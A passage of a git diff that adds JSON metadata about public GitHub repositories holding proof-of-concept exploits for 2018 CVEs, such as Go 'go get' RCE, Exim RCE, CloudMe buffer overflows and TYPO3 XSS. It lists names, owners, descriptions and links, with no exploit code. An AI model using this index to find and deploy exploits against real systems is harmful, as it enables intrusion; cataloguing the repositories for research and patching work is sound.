"2023-10-01T06:07:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716437169, + "name": "Orange", + "full_name": "Ashved9\/Orange", + "owner": { + "login": "Ashved9", + "id": 29914914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29914914?v=4", + "html_url": "https:\/\/github.com\/Ashved9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ashved9\/Orange", + "description": "CVE-2018-6574: go get RCE", + "fork": false, + "created_at": "2023-11-09T06:11:58Z", + "updated_at": "2023-11-09T06:11:58Z", + "pushed_at": "2023-11-09T06:11:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730824366, + "name": "cve-2018-6574-exploit", + "full_name": "zerbaliy3v\/cve-2018-6574-exploit", + "owner": { + "login": "zerbaliy3v", + "id": 128548437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128548437?v=4", + "html_url": "https:\/\/github.com\/zerbaliy3v", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zerbaliy3v\/cve-2018-6574-exploit", + "description": "CVE-2018-6574 this vulnerability impacts Golang go get command and allows an attacker to gain code execution on a system by installing a malicious library, this vulnerability was fixed in Go 1.8. 7, 1.9. 4 and 1.10rc2. Golang will build native extensions.", + "fork": false, + "created_at": "2023-12-12T18:51:24Z", + "updated_at": "2023-12-12T19:08:34Z", + "pushed_at": "2023-12-12T19:09:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-6574" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773956574, + "name": "-CVE-2018-6574", + "full_name": "jftierno\/-CVE-2018-6574", + "owner": { + "login": "jftierno", + "id": 49501961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49501961?v=4", + "html_url": "https:\/\/github.com\/jftierno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jftierno\/-CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2024-03-18T17:34:23Z", + "updated_at": "2024-03-18T17:36:23Z", + "pushed_at": "2024-03-18T18:31:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789441464, + "name": "cve-2018-6574", + "full_name": "faiqu3\/cve-2018-6574", + "owner": { + "login": "faiqu3", + "id": 49121486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49121486?v=4", + "html_url": "https:\/\/github.com\/faiqu3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faiqu3\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2024-04-20T15:02:22Z", + "updated_at": "2024-04-20T15:44:57Z", + "pushed_at": "2024-04-20T15:44:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802186256, + "name": "CVE-2018-6574-go-get-RCE", + "full_name": "Dannners\/CVE-2018-6574-go-get-RCE", + "owner": { + "login": "Dannners", + "id": 37989081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37989081?v=4", + "html_url": "https:\/\/github.com\/Dannners", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dannners\/CVE-2018-6574-go-get-RCE", + "description": "CVE-2018-6574-go-get-RCE", + "fork": false, + "created_at": "2024-05-17T17:30:06Z", + "updated_at": "2024-05-29T17:55:04Z", + "pushed_at": "2024-05-29T17:55:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817038281, + "name": "CVE-2018-6574", + "full_name": "bme2003\/CVE-2018-6574", + "owner": { + "login": "bme2003", + "id": 123276917, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123276917?v=4", + "html_url": "https:\/\/github.com\/bme2003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bme2003\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2024-06-18T22:33:17Z", + "updated_at": "2024-06-19T03:49:25Z", + "pushed_at": "2024-06-19T03:49:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825339278, + "name": "cve-2018-6574", + "full_name": "iNoSec2\/cve-2018-6574", + "owner": { + "login": "iNoSec2", + "id": 51358868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51358868?v=4", + "html_url": "https:\/\/github.com\/iNoSec2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iNoSec2\/cve-2018-6574", + "description": "pentesterlab", + "fork": false, + "created_at": "2024-07-07T14:05:43Z", + "updated_at": "2024-07-07T14:31:51Z", + "pushed_at": "2024-07-07T14:31:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 852845799, + "name": "CVE-2018-6574", + "full_name": "faqihudin13\/CVE-2018-6574", + "owner": { + "login": "faqihudin13", + "id": 104276861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104276861?v=4", + "html_url": "https:\/\/github.com\/faqihudin13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faqihudin13\/CVE-2018-6574", + "description": "CVE-2018-6574: go get", + "fork": false, + "created_at": "2024-09-05T14:27:37Z", + "updated_at": "2024-09-05T15:06:40Z", + "pushed_at": "2024-09-05T15:06:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854599651, + "name": "cve-2018-6574", + "full_name": "lisu60\/cve-2018-6574", + "owner": { + "login": "lisu60", + "id": 5656111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5656111?v=4", + "html_url": "https:\/\/github.com\/lisu60", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisu60\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2024-09-09T13:11:53Z", + "updated_at": "2024-09-09T13:15:23Z", + "pushed_at": "2024-09-09T13:15:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858375785, + "name": "CVE-2018-6574", + "full_name": "Saboor-Hakimi\/CVE-2018-6574", + "owner": { + "login": "Saboor-Hakimi", + "id": 44523544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44523544?v=4", + "html_url": "https:\/\/github.com\/Saboor-Hakimi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saboor-Hakimi\/CVE-2018-6574", + "description": null, + "fork": false, + "created_at": "2024-09-16T19:34:40Z", + "updated_at": "2024-09-16T19:41:04Z", + "pushed_at": "2024-09-16T19:41:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6622.json b/2018/CVE-2018-6622.json new file mode 100644 index 0000000000..4456280fe9 --- /dev/null +++ b/2018/CVE-2018-6622.json @@ -0,0 +1,41 @@ +[ + { + "id": 169530427, + "name": "napper-for-tpm", + "full_name": "kkamagui\/napper-for-tpm", + "owner": { + "login": "kkamagui", + "id": 1183342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1183342?v=4", + "html_url": "https:\/\/github.com\/kkamagui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkamagui\/napper-for-tpm", + "description": "TPM vulnerability checking tool for CVE-2018-6622. This tool will be published at Black Hat Asia 2019 and Black Hat Europe 2019", + "fork": false, + "created_at": "2019-02-07T06:45:27Z", + "updated_at": "2024-10-22T13:18:26Z", + "pushed_at": "2022-06-26T06:08:02Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blackhat", + "blackhat2019", + "cve-2018-6622", + "dtpm", + "ftpm", + "intel-ptt", + "tpm" + ], + "visibility": "public", + "forks": 20, + "watchers": 100, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6643.json b/2018/CVE-2018-6643.json new file mode 100644 index 0000000000..e13b2198d2 --- /dev/null +++ b/2018/CVE-2018-6643.json @@ -0,0 +1,33 @@ +[ + { + "id": 146195248, + "name": "CVE-2018-6643", + "full_name": "undefinedmode\/CVE-2018-6643", + "owner": { + "login": "undefinedmode", + "id": 4165481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4165481?v=4", + "html_url": "https:\/\/github.com\/undefinedmode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/undefinedmode\/CVE-2018-6643", + "description": "CVE-2018-6643", + "fork": false, + "created_at": "2018-08-26T16:03:08Z", + "updated_at": "2018-08-27T13:36:10Z", + "pushed_at": "2018-08-28T23:03:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6789.json b/2018/CVE-2018-6789.json new file mode 100644 index 0000000000..5022054e09 --- /dev/null +++ b/2018/CVE-2018-6789.json @@ -0,0 +1,172 @@ +[ + { + "id": 125541441, + "name": "exim-vuln-poc", + "full_name": "c0llision\/exim-vuln-poc", + "owner": { + "login": "c0llision", + "id": 32601427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32601427?v=4", + "html_url": "https:\/\/github.com\/c0llision", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0llision\/exim-vuln-poc", + "description": "CVE-2018-6789", + "fork": false, + "created_at": "2018-03-16T16:21:22Z", + "updated_at": "2018-05-03T17:20:25Z", + "pushed_at": "2018-05-03T17:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 156674030, + "name": "CVE-2018-6789", + "full_name": "beraphin\/CVE-2018-6789", + "owner": { + "login": "beraphin", + "id": 25315905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315905?v=4", + "html_url": "https:\/\/github.com\/beraphin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/beraphin\/CVE-2018-6789", + "description": null, + "fork": false, + "created_at": "2018-11-08T08:25:42Z", + "updated_at": "2020-03-06T03:34:15Z", + "pushed_at": "2020-03-06T03:34:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 214143215, + "name": "Exim-CVE-2018-6789", + "full_name": "synacktiv\/Exim-CVE-2018-6789", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/Exim-CVE-2018-6789", + "description": "PoC materials to exploit CVE-2018-6789", + "fork": false, + "created_at": "2019-10-10T09:36:03Z", + "updated_at": "2024-08-12T19:53:47Z", + "pushed_at": "2019-10-10T09:54:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 244424491, + "name": "exim-rce-cve-2018-6789", + "full_name": "martinclauss\/exim-rce-cve-2018-6789", + "owner": { + "login": "martinclauss", + "id": 51541424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51541424?v=4", + "html_url": "https:\/\/github.com\/martinclauss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/martinclauss\/exim-rce-cve-2018-6789", + "description": "This repository provides a learning environment to understand how an Exim RCE exploit for CVE-2018-6789 works.", + "fork": false, + "created_at": "2020-03-02T16:53:02Z", + "updated_at": "2024-11-21T04:03:43Z", + "pushed_at": "2024-02-05T13:46:40Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binary-exploitation", + "cve", + "docker", + "educational", + "exim", + "exim-exploit", + "exploit", + "exploit-development", + "gdb", + "learning-by-doing", + "pwndbg", + "pwntools", + "rce", + "vagrant" + ], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674981101, + "name": "CVE-2018-6789-Python3", + "full_name": "thistehneisen\/CVE-2018-6789-Python3", + "owner": { + "login": "thistehneisen", + "id": 6432992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6432992?v=4", + "html_url": "https:\/\/github.com\/thistehneisen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thistehneisen\/CVE-2018-6789-Python3", + "description": "Exim < 4.90.1 RCE Vulnerability remake for Python3 with arguments passed from CLI", + "fork": false, + "created_at": "2023-08-05T11:28:49Z", + "updated_at": "2023-08-05T11:29:43Z", + "pushed_at": "2023-08-05T11:30:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6791.json b/2018/CVE-2018-6791.json new file mode 100644 index 0000000000..f187765992 --- /dev/null +++ b/2018/CVE-2018-6791.json @@ -0,0 +1,33 @@ +[ + { + "id": 121303569, + "name": "KDE_Vuln", + "full_name": "rarar0\/KDE_Vuln", + "owner": { + "login": "rarar0", + "id": 14985119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14985119?v=4", + "html_url": "https:\/\/github.com\/rarar0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rarar0\/KDE_Vuln", + "description": "CVE-2018-6791 Troubleshooting", + "fork": false, + "created_at": "2018-02-12T21:21:29Z", + "updated_at": "2019-01-03T01:14:32Z", + "pushed_at": "2018-02-13T21:14:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6890.json b/2018/CVE-2018-6890.json new file mode 100644 index 0000000000..8bbce6402c --- /dev/null +++ b/2018/CVE-2018-6890.json @@ -0,0 +1,33 @@ +[ + { + "id": 121122391, + "name": "WolfCMS-XSS-POC", + "full_name": "pradeepjairamani\/WolfCMS-XSS-POC", + "owner": { + "login": "pradeepjairamani", + "id": 24669027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24669027?v=4", + "html_url": "https:\/\/github.com\/pradeepjairamani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pradeepjairamani\/WolfCMS-XSS-POC", + "description": "WolfCMS-v0.8.3.1 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6890", + "fork": false, + "created_at": "2018-02-11T12:43:41Z", + "updated_at": "2018-04-15T22:32:05Z", + "pushed_at": "2018-04-08T07:41:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6892.json b/2018/CVE-2018-6892.json new file mode 100644 index 0000000000..35b7c6b597 --- /dev/null +++ b/2018/CVE-2018-6892.json @@ -0,0 +1,95 @@ +[ + { + "id": 135526594, + "name": "CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass", + "full_name": "manojcode\/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass", + "owner": { + "login": "manojcode", + "id": 17510282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17510282?v=4", + "html_url": "https:\/\/github.com\/manojcode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manojcode\/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass", + "description": "My version - CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass on Win7 x64 CVE-2018-6892", + "fork": false, + "created_at": "2018-05-31T03:25:02Z", + "updated_at": "2018-06-04T01:09:39Z", + "pushed_at": "2018-06-04T01:09:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 135564232, + "name": "-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass", + "full_name": "manojcode\/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass", + "owner": { + "login": "manojcode", + "id": 17510282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17510282?v=4", + "html_url": "https:\/\/github.com\/manojcode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manojcode\/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass", + "description": "My version - [Win10 x64] CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass CVE-2018-6892", + "fork": false, + "created_at": "2018-05-31T09:44:07Z", + "updated_at": "2018-05-31T16:18:39Z", + "pushed_at": "2018-05-31T09:45:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 281250144, + "name": "CVE-2018-6892-Golang", + "full_name": "latortuga71\/CVE-2018-6892-Golang", + "owner": { + "login": "latortuga71", + "id": 42878263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42878263?v=4", + "html_url": "https:\/\/github.com\/latortuga71", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/latortuga71\/CVE-2018-6892-Golang", + "description": "Ported Exploit From Python To Golang", + "fork": false, + "created_at": "2020-07-20T23:50:41Z", + "updated_at": "2022-11-09T18:08:39Z", + "pushed_at": "2020-07-20T23:52:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6905.json b/2018/CVE-2018-6905.json new file mode 100644 index 0000000000..127960e482 --- /dev/null +++ b/2018/CVE-2018-6905.json @@ -0,0 +1,64 @@ +[ + { + "id": 128607175, + "name": "TYPO3-XSS-POC", + "full_name": "pradeepjairamani\/TYPO3-XSS-POC", + "owner": { + "login": "pradeepjairamani", + "id": 24669027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24669027?v=4", + "html_url": "https:\/\/github.com\/pradeepjairamani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pradeepjairamani\/TYPO3-XSS-POC", + "description": "Typo3 -v9.1.0 Persistent Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6905", + "fork": false, + "created_at": "2018-04-08T06:34:34Z", + "updated_at": "2024-08-01T02:31:57Z", + "pushed_at": "2018-04-08T07:42:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 373081575, + "name": "CVE-2018-6905", + "full_name": "dnr6419\/CVE-2018-6905", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2018-6905", + "description": "typo3 install.php XSS", + "fork": false, + "created_at": "2021-06-02T07:37:42Z", + "updated_at": "2021-06-02T07:44:16Z", + "pushed_at": "2021-06-02T07:44:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6961.json b/2018/CVE-2018-6961.json new file mode 100644 index 0000000000..d6c9fcd5f7 --- /dev/null +++ b/2018/CVE-2018-6961.json @@ -0,0 +1,64 @@ +[ + { + "id": 148533057, + "name": "CVE-2018-6961", + "full_name": "bokanrb\/CVE-2018-6961", + "owner": { + "login": "bokanrb", + "id": 25235094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25235094?v=4", + "html_url": "https:\/\/github.com\/bokanrb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bokanrb\/CVE-2018-6961", + "description": "veloCloud VMWare - Vulnerability", + "fork": false, + "created_at": "2018-09-12T19:44:15Z", + "updated_at": "2019-06-30T13:01:22Z", + "pushed_at": "2019-01-28T22:42:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 169735606, + "name": "CVE-2018-6961", + "full_name": "r3dxpl0it\/CVE-2018-6961", + "owner": { + "login": "r3dxpl0it", + "id": 43002597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43002597?v=4", + "html_url": "https:\/\/github.com\/r3dxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dxpl0it\/CVE-2018-6961", + "description": "VMware NSX SD-WAN command injection vulnerability ", + "fork": false, + "created_at": "2019-02-08T13:00:35Z", + "updated_at": "2024-03-22T02:25:09Z", + "pushed_at": "2019-02-08T13:05:26Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6981.json b/2018/CVE-2018-6981.json new file mode 100644 index 0000000000..bd5add3ba2 --- /dev/null +++ b/2018/CVE-2018-6981.json @@ -0,0 +1,33 @@ +[ + { + "id": 157844536, + "name": "vmxnet3Hunter", + "full_name": "LxKxC\/vmxnet3Hunter", + "owner": { + "login": "LxKxC", + "id": 23060271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23060271?v=4", + "html_url": "https:\/\/github.com\/LxKxC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LxKxC\/vmxnet3Hunter", + "description": "Use this tool to prioritize cluster patching for the recent VMware advisory VMSA-2018-0027 related to CVE-2018-6981 and CVE-2018-6982.", + "fork": false, + "created_at": "2018-11-16T09:31:03Z", + "updated_at": "2018-11-16T09:31:05Z", + "pushed_at": "2018-11-13T18:53:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7171.json b/2018/CVE-2018-7171.json new file mode 100644 index 0000000000..e2faba8846 --- /dev/null +++ b/2018/CVE-2018-7171.json @@ -0,0 +1,33 @@ +[ + { + "id": 116845038, + "name": "sharingIsCaring", + "full_name": "mechanico\/sharingIsCaring", + "owner": { + "login": "mechanico", + "id": 32109749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32109749?v=4", + "html_url": "https:\/\/github.com\/mechanico", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mechanico\/sharingIsCaring", + "description": "TwonkyMedia Server 7.0.11-8.5 Directory Traversal CVE-2018-7171", + "fork": false, + "created_at": "2018-01-09T17:01:45Z", + "updated_at": "2024-08-12T19:35:23Z", + "pushed_at": "2018-06-03T14:54:18Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7197.json b/2018/CVE-2018-7197.json new file mode 100644 index 0000000000..7851927187 --- /dev/null +++ b/2018/CVE-2018-7197.json @@ -0,0 +1,33 @@ +[ + { + "id": 122677679, + "name": "CVE-2018-7197", + "full_name": "Alyssa-o-Herrera\/CVE-2018-7197", + "owner": { + "login": "Alyssa-o-Herrera", + "id": 27867026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27867026?v=4", + "html_url": "https:\/\/github.com\/Alyssa-o-Herrera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alyssa-o-Herrera\/CVE-2018-7197", + "description": "CVE-2018-7197 Write up", + "fork": false, + "created_at": "2018-02-23T22:06:51Z", + "updated_at": "2018-10-04T17:25:29Z", + "pushed_at": "2018-02-23T22:07:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7211.json b/2018/CVE-2018-7211.json new file mode 100644 index 0000000000..f11eb7b20d --- /dev/null +++ b/2018/CVE-2018-7211.json @@ -0,0 +1,33 @@ +[ + { + "id": 121942694, + "name": "CVE-2018-7211-PoC", + "full_name": "c3r34lk1ll3r\/CVE-2018-7211-PoC", + "owner": { + "login": "c3r34lk1ll3r", + "id": 12492834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12492834?v=4", + "html_url": "https:\/\/github.com\/c3r34lk1ll3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3r34lk1ll3r\/CVE-2018-7211-PoC", + "description": "This is the original PoC of CVE-2018-7211", + "fork": false, + "created_at": "2018-02-18T10:47:00Z", + "updated_at": "2018-02-18T10:48:45Z", + "pushed_at": "2018-02-18T10:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7249.json b/2018/CVE-2018-7249.json new file mode 100644 index 0000000000..57cab9fb2d --- /dev/null +++ b/2018/CVE-2018-7249.json @@ -0,0 +1,33 @@ +[ + { + "id": 122389904, + "name": "NotSecDrv", + "full_name": 